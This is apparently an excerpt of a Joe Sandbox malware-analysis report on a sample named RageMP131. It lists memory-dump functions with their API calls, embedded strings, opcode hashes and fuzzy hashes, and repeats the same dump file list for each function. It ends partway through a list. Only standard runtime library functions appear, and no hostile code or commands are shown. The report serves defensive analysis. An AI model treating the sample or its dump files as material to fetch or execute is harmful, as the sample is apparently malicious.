Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0f107330d766cddc7c0a10907746bdf71365b580d9ec1d68e06f7701c5daf90e
Instruction ID: 5bc2f20d26a9b35c3e8cca8815c299f6c5b3eadc7762f586cada59ffb6ad2177
Opcode Fuzzy Hash: 0f107330d766cddc7c0a10907746bdf71365b580d9ec1d68e06f7701c5daf90e
Instruction Fuzzy Hash: FF112B736091143AD725227468267FE2B8B9FD3734F75065DF9048F2D2DE619CC18359

Function 006AAD7C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,006EF970,0069B2D2,00000002,0069B2D2,00000000,?,?,?,006AAE86,00000000,?,0069B2D2,00000002,006EF970), ref: 006AADB8

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2ce7ae582f8b46220ab4808cfc6793fffa7de235c42d37fd6130b3dbbb1739f2
Instruction ID: f6a76a549e8bbf57d57b7da09c611a02f18cf7d3809bc9899d6c6604932da778
Opcode Fuzzy Hash: 2ce7ae582f8b46220ab4808cfc6793fffa7de235c42d37fd6130b3dbbb1739f2
Instruction Fuzzy Hash: D301D6326141556FCF05AF59DC05DDE3B6BDF82321B340249F8519B291EB71DD51CB90

Function 0069BFB1 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C1FDE

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
Instruction ID: d403e680dad0dac643e662c12a223aaad6f45f1c8de352debb111a33a0deecec
Opcode Fuzzy Hash: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
Instruction Fuzzy Hash: 72012B3540460D77CF14AED4EC01999B79EDE02360B50853DF90496951FB70E9908BE9

Function 006B3113 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0069A41C,?,?,006B2A99,00000001,00000364,?,00000006,000000FF,?,0069D39B,?,?,?,?), ref: 006B3154

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b12476a358bce82ef68f4064fd569e8f45a1d6f8fd6cf518fd8a52ef0d4f9940
Instruction ID: 0f5cd83bb9a70e47d0afb4a006223b1273c52556a314f8ff0af23e613e2b0775
Opcode Fuzzy Hash: b12476a358bce82ef68f4064fd569e8f45a1d6f8fd6cf518fd8a52ef0d4f9940
Instruction Fuzzy Hash: B6F0E971705638669B217A6D8C02BDB374FAF42BA0B158015BC08A6380CF30DE8147F4

Function 006B3B4D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0069D39B,?,?,?,?,?,005C2D8D,0069A41C,?,?,0069A41C), ref: 006B3B80

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa2fa0197be4a77caad243701c860a6bf21599fd3bb548500bdb49f8ec4136fd
Instruction ID: 44a26996c7d40496956b391cdf2b89e9c02d3823269eca9dc1fa9511170bce6e
Opcode Fuzzy Hash: fa2fa0197be4a77caad243701c860a6bf21599fd3bb548500bdb49f8ec4136fd
Instruction Fuzzy Hash: 68E0EDB13002366AE62036294C00BEB7A4FDFA23B0F150228AC1896385CF60CE8083B8

Non-executed Functions

Function 0062A120 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0062A143
std::_Lockit::_Lockit.LIBCPMT ref: 0062A165
std::_Lockit::~_Lockit.LIBCPMT ref: 0062A185
std::_Lockit::~_Lockit.LIBCPMT ref: 0062A1AF
std::_Lockit::_Lockit.LIBCPMT ref: 0062A21D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0062A269
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0062A283
std::_Lockit::~_Lockit.LIBCPMT ref: 0062A318
std::_Facet_Register.LIBCPMT ref: 0062A325

Strings

bad locale name, xrefs: 0062A33F

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
Instruction ID: 4520bb9ea4f2fb13aca0336c54c8218bd6ba6c1c77e2a4e536d750809e56c57a
Opcode Fuzzy Hash: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
Instruction Fuzzy Hash: 1B617BB1D006589BDF50DFE4E849BAEBBF6AF04710F18401DE805A7341EBB5AA05CF96

Function 005C3770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005C37E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005C3835
__Getctype.LIBCPMT ref: 005C384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005C386A
std::_Lockit::~_Lockit.LIBCPMT ref: 005C38FF

Strings

bad locale name, xrefs: 005C391C
0:\, xrefs: 005C3848

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:\$bad locale name
API String ID: 1840309910-381323209
Opcode ID: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
Instruction ID: 85dadb2b629b003dd1c15cde83567e63b6603cd8f7c5dc18547b40831c741856
Opcode Fuzzy Hash: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
Instruction Fuzzy Hash: D7515DB1D002489FEF10DFE4D945B9EFBF9AF14710F14812DE804AB241E775AA48CB92

Function 0069FB30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0069FB67
___except_validate_context_record.LIBVCRUNTIME ref: 0069FB6F
_ValidateLocalCookies.LIBCMT ref: 0069FBF8
__IsNonwritableInCurrentImage.LIBCMT ref: 0069FC23
_ValidateLocalCookies.LIBCMT ref: 0069FC78

Strings

csm, xrefs: 0069FC0D

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
Instruction ID: c6980bd0654e9df2564edadb583b94701c4113cb8d758c70f22ad7e66554c7f6
Opcode Fuzzy Hash: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
Instruction Fuzzy Hash: 1541C83190020CDBCF10EF68C894AAEBBAAAF45324F25C069EC14DB752D771ED41CB91

Function 006288E0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00628903
std::_Lockit::_Lockit.LIBCPMT ref: 00628926
std::_Lockit::~_Lockit.LIBCPMT ref: 00628946
std::_Facet_Register.LIBCPMT ref: 006289BB
std::_Lockit::~_Lockit.LIBCPMT ref: 006289D3
Concurrency::cancel_current_task.LIBCPMT ref: 006289EB

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
Instruction ID: c9029f6896445d316dd5a04902b74ce52702629516f2bc47d1272f8ecbd4cb18
Opcode Fuzzy Hash: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
Instruction Fuzzy Hash: 6241DF71D016299FCB10DF98EC41ABABBB6FB04320F144259E9156B751DB30AE84CFD2

Function 005C5DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005C60F2
___std_exception_destroy.LIBVCRUNTIME ref: 005C617F
___std_exception_copy.LIBVCRUNTIME ref: 005C6248

Strings

recursive_directory_iterator::operator++, xrefs: 005C61CC

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
Instruction ID: 08413dfb8df63a52a0f7290efaedbc90f32e6a05fbc46551035d60027a64b002
Opcode Fuzzy Hash: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
Instruction Fuzzy Hash: 77E1F4B09006049FDB18DF98D845FAEBBFAFF44300F14461DE456A7B82E774AA44CBA5

Function 005C84C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005C86DE
___std_exception_destroy.LIBVCRUNTIME ref: 005C86ED

Strings

at line , xrefs: 005C8518
, column , xrefs: 005C8555, 005C856B

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
Instruction ID: c64b09841dabcf670b657a8fb7792b1431763f6087eccbf2f57a40131b36d04f
Opcode Fuzzy Hash: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
Instruction Fuzzy Hash: BB612A71D002049FDB08DFA8DC85BADBFB6FF55310F14861CE415A7782EBB4AA848B95

Function 005C3B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F

Strings

ios_base::eofbit set, xrefs: 005C3BB6
ios_base::failbit set, xrefs: 005C3AC8, 005C3BB1
ios_base::badbit set, xrefs: 005C3BA7, 005C3BD2, 005C3BF3

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
